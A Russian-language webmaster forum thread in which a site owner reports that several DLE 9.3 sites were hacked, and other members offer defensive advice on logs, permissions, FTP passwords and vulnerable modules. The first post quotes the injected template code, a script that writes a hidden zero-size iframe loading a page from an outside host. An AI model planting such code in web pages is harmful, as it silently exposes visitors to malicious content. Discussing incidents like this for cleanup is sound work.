X   Сообщение сайта
(Сообщение закроется через 2 секунды)




Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Добавить ответ в эту тему
> Взломали несколько сайтов на ДЛЕ
bmp104
Topic Starter сообщение 28.12.2011, 17:45; Ответить: bmp104
Сообщение #1


Бывалый
****

Группа: Пользователь
Сообщений: 433
Регистрация: 13.12.2010
Пользователь №: 24763
Спасибо сказали: 45 раз(а)

Репутация:   8  



Взломали несколько сайтов на ДЛЕ 9.3, в шаблоне main появился код:

Код
<script type="text/javascript">
function writeHTMLasJS(){
document.write("<iframe src=\"http:\/\/75.zapto.org\/bleedeng\/index.php\" width=\"0\" height=\"0\" frameborder=\"0\"> <\/iframe>");
}
</script>

<!--
now place this function call at whatever point
it needs to write the markup on to the page: -->

<script type="text/javascript">
writeHTMLasJS();
</script>


Может кто уже сталкивался с таким же, подскажите как могли ломануть.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
un1name1d
сообщение 28.12.2011, 17:47; Ответить: un1name1d
Сообщение #2


un1ymous
******

Группа: Активный пользователь
Сообщений: 1030
Регистрация: 20.1.2011
Пользователь №: 26868
Спасибо сказали: 576 раз(а)

Репутация:   91  



http://www.maultalk.com/topic101650s0.html (хотя там WP, а здесь - ДЛЕ, ну да ладно, методы профилактики подходят).

Сообщение отредактировал un1name1d - 28.12.2011, 17:48


--------------------
Для связи использую ЛС и icq 39999946. С уважением, un1name1d.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nick777
сообщение 29.12.2011, 0:20; Ответить: nick777
Сообщение #3


Завсегдатай
*****

Группа: Активный пользователь
Сообщений: 619
Регистрация: 19.9.2010
Из: Россия, город Москва Кто: Копирайтер/блоггер Блог url: partnerki-runeta.ru
Пользователь №: 21258
Спасибо сказали: 96 раз(а)

Репутация:   9  



un1ymous, +1.

Еще хочу добавить, что на DLE часто модули разные уязвимы - погуглите: "название модуля +уязвимость" - так с каждым модулем. Еще не помешает: "версия dle +уязвимость".


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
referer
сообщение 29.12.2011, 0:25; Ответить: referer
Сообщение #4


Завсегдатай
*****

Группа: Активный пользователь
Сообщений: 514
Регистрация: 20.11.2010
Из: Украина, Николаев
Пользователь №: 23793
Спасибо сказали: 67 раз(а)

Репутация:   20  



дле не ломали у меня хоть и версии древние 8-е на двух сайтах, но за джумлу знаю что постоянно домают)


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
xadminx
сообщение 29.12.2011, 0:38; Ответить: xadminx
Сообщение #5


Новичок
*

Группа: Наблюдатель
Сообщений: 11
Регистрация: 6.12.2010
Пользователь №: 24500
Спасибо сказали: 1 раз(а)

Репутация:   0  



могли у вас увести пароли от фтп


Спасибо сказали:
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
hostingbloger
сообщение 29.12.2011, 1:09; Ответить: hostingbloger
Сообщение #6


Новичок
*

Группа: Пользователь
Сообщений: 15
Регистрация: 28.12.2011
Пользователь №: 41441
Спасибо сказали: 2 раз(а)

Репутация:   -1  



Какие права стоят на /uploads и на /templates ? 777?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ZorG
сообщение 29.12.2011, 2:12; Ответить: ZorG
Сообщение #7


Частый гость
**

Группа: Пользователь
Сообщений: 82
Регистрация: 7.8.2010
Пользователь №: 19489
Спасибо сказали: 7 раз(а)

Репутация:   3  



Что в логах?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Exebit
сообщение 30.12.2011, 10:30; Ответить: Exebit
Сообщение #8


Новичок
*

Группа: Наблюдатель
Сообщений: 4
Регистрация: 26.12.2011
Пользователь №: 41388
Спасибо сказали: 1 раз(а)

Репутация:   0  



Попробуйте запустить антивирус встроенный в DLE 9.3 он покажет все левые файлы, а там уже можно прикинуть как сломали и еще какая версия движка, официальная или зануленная?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bmp104
Topic Starter сообщение 6.2.2012, 13:37; Ответить: bmp104
Сообщение #9


Бывалый
****

Группа: Пользователь
Сообщений: 433
Регистрация: 13.12.2010
Пользователь №: 24763
Спасибо сказали: 45 раз(а)

Репутация:   8  



Цитата
Какие права стоят на /uploads и на /templates ? 777?


Да, при установке сказано их ставить.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Добавить ответ в эту тему
Быстрый ответ
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) бесплатная раскрутка сайтов
вчера создал сервис бесплатной раскрутка(прогона) сайтов
10 trollo 95 Сегодня, 15:15
автор: votren
Горячая тема (нет новых ответов) Комплексный прогон сайтов лицензионным хрумером!
по Русским, Буржуйским базам форумов, блогов и каталогов!
179 swilch 27451 Сегодня, 15:04
автор: JOHNY
Открытая тема (нет новых ответов) Круглый стол «Новые технологии продвижения сайтов» Москва, 18 мая 2012
4 Гроховский 158 Сегодня, 15:02
автор: Dyke
Открытая тема (нет новых ответов) Несколько сайтов на одной площадке
вес их ссылок
0 bluestorm 19 Сегодня, 14:55
автор: bluestorm
Открытая тема (нет новых ответов) Нужен человек для добавления сайтов в каталоги
3 soz75land 127 Сегодня, 14:43
автор: keyseo


 



RSS Текстовая версия Сейчас: 21.5.2012, 15:15
Дизайн